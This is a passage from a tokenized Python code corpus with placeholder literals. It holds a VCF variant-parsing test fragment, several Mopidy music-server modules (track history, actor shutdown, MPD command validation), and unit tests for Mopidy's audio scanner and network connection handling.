= '<STR_LIT>' , delete = False , suffix = '<STR_LIT>' ) <EOL> outfile . close ( ) <EOL> variant_printer = VariantPrinter ( <EOL> task_queue = variant_queue , <EOL> head = head , <EOL> mode = '<STR_LIT>' , <EOL> outfile = outfile . name <EOL> ) <EOL> variant_printer . start ( ) <EOL> batch = OrderedDict ( ) <EOL> for line in open ( vcf_file ) : <EOL> line = line . rstrip ( ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> head . parse_meta_data ( line ) <EOL> else : <EOL> head . parse_header_line ( line ) <EOL> else : <EOL> variant_dict = get_variant_dict ( line , head . header ) <EOL> print ( variant_dict ) <EOL> variant_id = get_variant_id ( variant_dict ) <EOL> variant_dict [ '<STR_LIT>' ] = variant_id <EOL> variant_dict [ '<STR_LIT>' ] = get_info_dict ( variant_dict [ '<STR_LIT>' ] ) <EOL> variant_queue . put ( variant_dict ) <EOL> variant_queue . put ( None ) <EOL> variant_printer . join ( ) <EOL> variants = [ ] <EOL> with open ( outfile . name , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> variants . append ( line . rstrip ( ) . split ( '<STR_LIT:\t>' ) ) <EOL> assert variants [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:1>' <EOL> assert variants [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] == '<STR_LIT>' </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import copy <EOL> import logging <EOL> import time <EOL> from mopidy import models <EOL> logger = logging . getLogger ( __name__ ) <EOL> class HistoryController ( object ) : <EOL> pykka_traversable = True <EOL> def __init__ ( self ) : <EOL> self . _history = [ ] <EOL> def _add_track ( self , track ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( track , models . Track ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> timestamp = int ( time . time ( ) * <NUM_LIT:1000> ) <EOL> name_parts = [ ] <EOL> if track . artists : <EOL> name_parts . append ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ artist . name for artist in track . artists ] ) ) <EOL> if track . name is not None : <EOL> name_parts . append ( track . name ) <EOL> name = '<STR_LIT>' . join ( name_parts ) <EOL> ref = models . Ref . track ( uri = track . uri , name = name ) <EOL> self . _history . insert ( <NUM_LIT:0> , ( timestamp , ref ) ) <EOL> def get_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _history ) <EOL> def get_history ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . copy ( self . _history ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> import threading <EOL> import pykka <EOL> from mopidy . compat import thread <EOL> logger = logging . getLogger ( __name__ ) <EOL> def exit_process ( ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> thread . interrupt_main ( ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> def sigterm_handler ( signum , frame ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> exit_process ( ) <EOL> def stop_actors_by_class ( klass ) : <EOL> actors = pykka . ActorRegistry . get_by_class ( klass ) <EOL> logger . debug ( '<STR_LIT>' , len ( actors ) , klass . __name__ ) <EOL> for actor in actors : <EOL> actor . stop ( ) <EOL> def stop_remaining_actors ( ) : <EOL> num_actors = len ( pykka . ActorRegistry . get_all ( ) ) <EOL> while num_actors : <EOL> logger . error ( <EOL> '<STR_LIT>' ) <EOL> logger . debug ( <EOL> '<STR_LIT>' , <EOL> num_actors , threading . active_count ( ) - num_actors , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ t . name for t in threading . enumerate ( ) ] ) ) <EOL> logger . debug ( '<STR_LIT>' , num_actors ) <EOL> pykka . ActorRegistry . stop_all ( ) <EOL> num_actors = len ( pykka . ActorRegistry . get_all ( ) ) <EOL> logger . debug ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , unicode_literals <EOL> import inspect <EOL> from mopidy . mpd import exceptions <EOL> ENCODING = '<STR_LIT>' <EOL> LINE_TERMINATOR = '<STR_LIT:\n>' <EOL> VERSION = '<STR_LIT>' <EOL> def load_protocol_modules ( ) : <EOL> """<STR_LIT>""" <EOL> from . import ( <EOL> audio_output , channels , command_list , connection , current_playlist , <EOL> mount , music_db , playback , reflection , status , stickers , <EOL> stored_playlists ) <EOL> def INT ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return int ( value ) <EOL> def UINT ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not value . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return int ( value ) <EOL> def BOOL ( value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT:0>' ) : <EOL> return bool ( int ( value ) ) <EOL> raise ValueError ( '<STR_LIT>' % value ) <EOL> def RANGE ( value ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT::>' in value : <EOL> start , stop = value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> start = UINT ( start ) <EOL> if stop . strip ( ) : <EOL> stop = UINT ( stop ) <EOL> if start >= stop : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> stop = None <EOL> else : <EOL> start = UINT ( value ) <EOL> stop = start + <NUM_LIT:1> <EOL> return slice ( start , stop ) <EOL> class Commands ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . handlers = { } <EOL> def add ( self , name , auth_required = True , list_command = True , ** validators ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> if name in self . handlers : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> args , varargs , keywords , defaults = inspect . getargspec ( func ) <EOL> defaults = dict ( zip ( args [ - len ( defaults or [ ] ) : ] , defaults or [ ] ) ) <EOL> if not args and not varargs : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if len ( args ) > <NUM_LIT:1> and varargs : <EOL> raise TypeError ( <EOL> '<STR_LIT>' ) <EOL> if not set ( validators . keys ( ) ) . issubset ( args ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if keywords : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def validate ( * args , ** kwargs ) : <EOL> if varargs : <EOL> return func ( * args , ** kwargs ) <EOL> try : <EOL> callargs = inspect . getcallargs ( func , * args , ** kwargs ) <EOL> except TypeError : <EOL> raise exceptions . MpdArgError ( <EOL> '<STR_LIT>' % name ) <EOL> for key , value in callargs . items ( ) : <EOL> default = defaults . get ( key , object ( ) ) <EOL> if key in validators and value != default : <EOL> try : <EOL> callargs [ key ] = validators [ key ] ( value ) <EOL> except ValueError : <EOL> raise exceptions . MpdArgError ( '<STR_LIT>' ) <EOL> return func ( ** callargs ) <EOL> validate . auth_required = auth_required <EOL> validate . list_command = list_command <EOL> self . handlers [ name ] = validate <EOL> return func <EOL> return wrapper <EOL> def call ( self , tokens , context = None ) : <EOL> """<STR_LIT>""" <EOL> if not tokens : <EOL> raise exceptions . MpdNoCommand ( ) <EOL> if tokens [ <NUM_LIT:0> ] not in self . handlers : <EOL> raise exceptions . MpdUnknownCommand ( command = tokens [ <NUM_LIT:0> ] ) <EOL> return self . handlers [ tokens [ <NUM_LIT:0> ] ] ( context , * tokens [ <NUM_LIT:1> : ] ) <EOL> commands = Commands ( ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import os <EOL> import unittest <EOL> from mopidy import exceptions <EOL> from mopidy . audio import scan <EOL> from mopidy . internal import path as path_lib <EOL> from tests import path_to_data_dir <EOL> class ScannerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . errors = { } <EOL> self . result = { } <EOL> def find ( self , path ) : <EOL> media_dir = path_to_data_dir ( path ) <EOL> result , errors = path_lib . find_mtimes ( media_dir ) <EOL> for path in result : <EOL> yield os . path . join ( media_dir , path ) <EOL> def scan ( self , paths ) : <EOL> scanner = scan . Scanner ( ) <EOL> for path in paths : <EOL> uri = path_lib . path_to_uri ( path ) <EOL> key = uri [ len ( '<STR_LIT>' ) : ] <EOL> try : <EOL> self . result [ key ] = scanner . scan ( uri ) <EOL> except exceptions . ScannerError as error : <EOL> self . errors [ key ] = error <EOL> def check ( self , name , key , value ) : <EOL> name = path_to_data_dir ( name ) <EOL> self . assertEqual ( self . result [ name ] . tags [ key ] , value ) <EOL> def check_if_missing_plugin ( self ) : <EOL> for path , result in self . result . items ( ) : <EOL> if not path . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if not result . playable and result . mime == '<STR_LIT>' : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> def test_tags_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assert_ ( self . result . values ( ) [ <NUM_LIT:0> ] . tags ) <EOL> def test_errors_is_not_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . assert_ ( not self . errors ) <EOL> def test_duration_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> ogg = path_to_data_dir ( '<STR_LIT>' ) <EOL> mp3 = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . result [ mp3 ] . duration , <NUM_LIT> ) <EOL> self . assertEqual ( self . result [ ogg ] . duration , <NUM_LIT> ) <EOL> def test_artist_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> def test_album_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def test_track_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT:title>' , [ '<STR_LIT>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT:title>' , [ '<STR_LIT>' ] ) <EOL> def test_nonexistant_dir_does_not_fail ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assert_ ( not self . errors ) <EOL> def test_other_media_is_ignored ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( self . result . values ( ) [ <NUM_LIT:0> ] . playable ) <EOL> def test_log_file_that_gst_thinks_is_mpeg_1_is_ignored ( self ) : <EOL> self . scan ( [ path_to_data_dir ( '<STR_LIT>' ) ] ) <EOL> self . check_if_missing_plugin ( ) <EOL> log = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertLess ( self . result [ log ] . duration , <NUM_LIT:100> ) <EOL> def test_empty_wav_file ( self ) : <EOL> self . scan ( [ path_to_data_dir ( '<STR_LIT>' ) ] ) <EOL> wav = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . result [ wav ] . duration , <NUM_LIT:0> ) <EOL> def test_uri_list ( self ) : <EOL> path = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . scan ( [ path ] ) <EOL> self . assertEqual ( self . result [ path ] . mime , '<STR_LIT>' ) <EOL> def test_text_plain ( self ) : <EOL> path = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . scan ( [ path ] ) <EOL> self . assertIn ( path , self . errors ) <EOL> @ unittest . SkipTest <EOL> def test_song_without_time_is_handeled ( self ) : <EOL> pass </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import errno <EOL> import logging <EOL> import socket <EOL> import unittest <EOL> from mock import Mock , call , patch , sentinel <EOL> import pykka <EOL> from mopidy . internal import network <EOL> from mopidy . internal . gi import GObject <EOL> from tests import any_int , any_unicode <EOL> class ConnectionTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock = Mock ( spec = network . Connection ) <EOL> def test_init_ensure_nonblocking_io ( self ) : <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , Mock ( ) , { } , sock , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> sock . setblocking . assert_called_once_with ( False ) <EOL> def test_init_starts_actor ( self ) : <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , { } , Mock ( ) , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> protocol . start . assert_called_once_with ( self . mock ) <EOL> def test_init_enables_recv_and_timeout ( self ) : <EOL> network . Connection . __init__ ( <EOL> self . mock , Mock ( ) , { } , Mock ( ) , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> self . mock . enable_recv . assert_called_once_with ( ) <EOL> self . mock . enable_timeout . assert_called_once_with ( ) <EOL> def test_init_stores_values_in_attributes ( self ) : <EOL> addr = ( sentinel . host , sentinel . port ) <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> protocol_kwargs = { } <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , protocol_kwargs , sock , addr , sentinel . timeout ) <EOL> self . assertEqual ( sock , self . mock . sock ) <EOL> self . assertEqual ( protocol , self . mock . protocol ) <EOL> self . assertEqual ( protocol_kwargs , self . mock . protocol_kwargs ) <EOL> self . assertEqual ( sentinel . timeout , self . mock . timeout ) <EOL> self . assertEqual ( sentinel . host , self . mock . host ) <EOL> self . assertEqual ( sentinel . port , self . mock . port ) <EOL> def test_init_handles_ipv6_addr ( self ) : <EOL> addr = ( <EOL> sentinel . host , sentinel . port , sentinel . flowinfo , sentinel . scopeid ) <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> protocol_kwargs = { } <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , protocol_kwargs , sock , addr , sentinel . timeout ) <EOL> self . assertEqual ( sentinel . host , self . mock . host ) <EOL> self . assertEqual ( sentinel . port , self . mock . port ) <EOL> def test_stop_disables_recv_send_and_timeout ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . disable_timeout . assert_called_once_with ( ) <EOL> self . mock . disable_recv . assert_called_once_with ( ) <EOL> self . mock . disable_send . assert_called_once_with ( ) <EOL> def test_stop_closes_socket ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . sock . close . assert_called_once_with ( ) <EOL> def test_stop_closes_socket_error ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . close . side_effect = socket . error <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . sock . close . assert_called_once_with ( ) <EOL> def test_stop_stops_actor ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . actor_ref . stop . assert_called_once_with ( block = False ) <EOL> def test_stop_handles_actor_already_being_stopped ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . actor_ref . stop . side_effect = pykka . ActorDeadError ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . actor_ref . stop . assert_called_once_with ( block = False ) <EOL> def test_stop_sets_stopping_to_true ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . assertEqual ( True , self . mock . stopping ) <EOL> def test_stop_does_not_proceed_when_already_stopping ( self ) : <EOL> self . mock . stopping = True <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . actor_ref . stop . call_count ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . sock . close . call_count ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_reason ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> network . logger . log . assert_called_once_with ( <EOL> logging . DEBUG , sentinel . reason ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_reason_with_level ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( <EOL> self . mock , sentinel . reason , level = sentinel . level ) <EOL> network . logger . log . assert_called_once_with ( <EOL> sentinel . level , sentinel . reason ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_that_it_is_calling_itself ( self ) : <EOL> self . mock . stopping = True <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> network . logger . log ( any_int , any_unicode ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_recv_registers_with_gobject ( self ) : <EOL> self . mock . recv_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . return_value = sentinel . fileno <EOL> GObject . io_add_watch . return_value = sentinel . tag <EOL> network . Connection . enable_recv ( self . mock ) <EOL> GObject . io_add_watch . assert_called_once_with ( <EOL> sentinel . fileno , <EOL> GObject . IO_IN | GObject . IO_ERR | GObject . IO_HUP , <EOL> self . mock . recv_callback ) <EOL> self . assertEqual ( sentinel . tag , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_recv_already_registered ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . recv_id = sentinel . tag <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . io_add_watch . call_count ) <EOL> def test_enable_recv_does_not_change_tag ( self ) : <EOL> self . mock . recv_id = sentinel . tag <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . assertEqual ( sentinel . tag , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_recv_deregisters ( self ) : <EOL> self . mock . recv_id = sentinel . tag <EOL> network . Connection . disable_recv ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_recv_already_deregistered ( self ) : <EOL> self . mock . recv_id = None <EOL> network . Connection . disable_recv ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> def test_enable_recv_on_closed_socket ( self ) : <EOL> self . mock . recv_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . side_effect = socket . error ( errno . EBADF , '<STR_LIT>' ) <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_send_registers_with_gobject ( self ) : <EOL> self . mock . send_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . return_value = sentinel . fileno <EOL> GObject . io_add_watch . return_value = sentinel . tag <EOL> network . Connection . enable_send ( self . mock ) <EOL> GObject . io_add_watch . assert_called_once_with ( <EOL> sentinel . fileno , <EOL> GObject . IO_OUT | GObject . IO_ERR | GObject . IO_HUP , <EOL> self . mock . send_callback ) <EOL> self . assertEqual ( sentinel . tag , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_send_already_registered ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . send_id = sentinel . tag <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . io_add_watch . call_count ) <EOL> def test_enable_send_does_not_change_tag ( self ) : <EOL> self . mock . send_id = sentinel . tag <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( sentinel . tag , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_send_deregisters ( self ) : <EOL> self . mock . send_id = sentinel . tag <EOL> network . Connection . disable_send ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_send_already_deregistered ( self ) : <EOL> self . mock . send_id = None <EOL> network . Connection . disable_send ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> def test_enable_send_on_closed_socket ( self ) : <EOL> self . mock . send_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . side_effect = socket . error ( errno . EBADF , '<STR_LIT>' ) <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_clears_existing_timeouts ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . mock . disable_timeout . assert_called_once_with ( ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_add_gobject_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> GObject . timeout_add_seconds . return_value = sentinel . tag <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> GObject . timeout_add_seconds . assert_called_once_with ( <EOL> <NUM_LIT:10> , self . mock . timeout_callback ) <EOL> self . assertEqual ( sentinel . tag , self . mock . timeout_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_does_not_add_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:0> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> self . mock . timeout = - <NUM_LIT:1> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> self . mock . timeout = None <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> def test_enable_timeout_does_not_call_disable_for_invalid_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:0> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> self . mock . timeout = - <NUM_LIT:1> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> self . mock . timeout = None <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_timeout_deregisters ( self ) : <EOL> self . mock . timeout_id = sentinel . tag <EOL> network . Connection . disable_timeout ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . timeout_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_timeout_already_deregistered ( self ) : <EOL> self . mock . timeout_id = None <EOL> network . Connection . disable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . timeout_id ) <EOL> def test_queue_send_acquires_and_releases_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( True ) <EOL> self . mock . send_lock . release . assert_called_once_with ( ) <EOL> def test_queue_send_calls_send ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . enable_send . call_count ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_queue_send_calls_enable_send_for_partial_send ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . mock . enable_send . assert_called_once_with ( ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_queue_send_calls_send_with_existing_buffer ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT:foo>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:bar>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . enable_send . call_count ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_recv_callback_respects_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_respects_io_hup ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_HUP ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_respects_io_hup_and_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , <EOL> GObject . IO_IN | GObject . IO_HUP | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_sends_data_to_actor ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT:data>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . actor_ref . tell . assert_called_once_with ( <EOL> { '<STR_LIT>' : '<STR_LIT:data>' } ) <EOL> def test_recv_callback_handles_dead_actors ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT:data>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . actor_ref . tell . side_effect = pykka . ActorDeadError ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_gets_no_data ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( 